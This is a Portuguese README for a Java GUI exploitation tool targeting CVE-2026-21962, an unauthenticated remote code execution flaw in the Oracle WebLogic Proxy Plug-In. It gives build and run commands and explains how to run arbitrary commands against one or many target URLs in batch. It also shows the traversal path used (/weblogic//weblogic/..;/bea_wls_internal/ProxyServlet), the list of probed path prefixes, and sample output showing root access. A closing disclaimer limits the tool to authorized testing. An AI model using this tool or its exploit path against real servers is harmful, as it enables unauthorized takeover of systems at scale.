
Ferramenta GUI em Java para explorar o CVE-2026-21962, uma RCE não autenticada no Oracle WebLogic Proxy Plug-In, permitindo execução de comandos em múltiplos alvos via HTTP.
Versão Java GUI da ferramenta de exploração da vulnerabilidade RCE (Execução Remota de Código) do Oracle WebLogic Server Proxy Plug-In.
java-version/
├── pom.xml # Arquivo de configuração do projeto Maven
├── README.md # Documentação do projeto
├── run.bat # Script de inicialização para Windows
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # Ponto de entrada do programa
├── core/
│ └── Exploit.java # Lógica principal da exploração
├── gui/
│ └── MainWindow.java # Janela principal da GUI
└── util/
└── HttpClient.java # Utilitário de requisições HTTP
A janela do programa contém as seguintes áreas:
Área de parâmetros de entrada (topo)
Área de botões (meio)
Área de log de execução (parte inferior esquerda)
Área de saída de comandos (parte inferior direita)
cd java-version
mvn clean compile
mvn clean package
O arquivo JAR empacotado está localizado em: target/cve-2026-21962-1.0.0.jar
Clique duas vezes no arquivo run.bat para iniciar o programa
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[caminho do jar de dependências]" com.ashwesker.cve202621962.Main
URL alvo:
http://192.168.1.100:7001
Comando a executar:
whoami
URLs alvo:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
Comando a executar:
id
Exemplo de saída:
[*] Iniciando teste da vulnerabilidade...
[*] URL alvo: http://192.168.1.100:7001
[*] Comando executado: id
[*] Caminho testado: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Sucesso! Código de status: 200
[+] Comando executado com sucesso!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] Iniciando teste da vulnerabilidade...
[*] URL alvo: http://192.168.1.101:7001
[*] Comando executado: id
[*] Caminho testado: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Sucesso! Código de status: 200
[+] Comando executado com sucesso!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
Após iniciar o programa, insira o endereço do servidor alvo no campo de texto "URL alvo"
http://target:7001 ou https://oracle-server:4443No campo "Comando a executar", insira o comando desejado
whoami, id, powershell -c ... etc.Clique no botão "Executar exploração" para iniciar o teste
Verifique o "Log de execução" abaixo para acompanhar o processo de teste
Verifique a "Saída de comandos" abaixo para obter os resultados da execução
No campo de texto "URL alvo", insira vários endereços alvo, um por linha
http://target1:7001
http://target2:7001
https://target3:4443
No campo "Comando a executar", insira o comando desejado
Clique no botão "Executar exploração" para iniciar o teste em lote
O programa testará cada alvo sequencialmente, e as saídas de diferentes alvos serão separadas por ================ (80 sinais de igual)
Verifique o "Log de execução" abaixo para acompanhar o processo de teste de cada alvo
Verifique a "Saída de comandos" abaixo para obter os resultados de todos os alvos
O programa testa automaticamente os seguintes caminhos:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ Atenção: Esta ferramenta destina-se apenas a testes de segurança autorizados. O uso não autorizado desta ferramenta para atacar sistemas é ilegal.
Main.java
Exploit.java
MainWindow.java
HttpClient.java
Este projeto destina-se apenas a fins educacionais e de pesquisa de segurança.